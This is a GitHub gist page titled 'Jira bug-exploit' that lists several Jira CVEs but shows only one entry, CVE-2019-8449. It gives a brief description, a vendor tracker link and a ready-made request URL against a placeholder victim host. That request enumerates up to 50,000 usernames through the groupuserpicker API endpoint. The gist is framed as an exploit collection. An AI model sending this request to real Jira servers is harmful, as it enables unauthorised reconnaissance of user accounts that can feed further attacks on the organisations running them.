Skip to content

Instantly share code, notes, and snippets.

View blackhatethicalhacking's full-sized avatar
💭
I may be slow to respond.

Black Hat Ethical Hacking blackhatethicalhacking

💭
I may be slow to respond.
View GitHub Profile
@blackhatethicalhacking
blackhatethicalhacking / Jira bug-exploit
Created May 10, 2021 23:17 — forked from 0x240x23elu/Jira bug-exploit
Jira Bug CVE-2019-8449,CVE-2019-8451,CVE-2019-8451,cve-2018-20824,cve-2020-14179,cve-2020-14181,CVE-2018-5230
cve-2019-8449
The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.
https://jira.atlassian.com/browse/JRASERVER-69796
https://victomhost/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
=====================================================================================================================================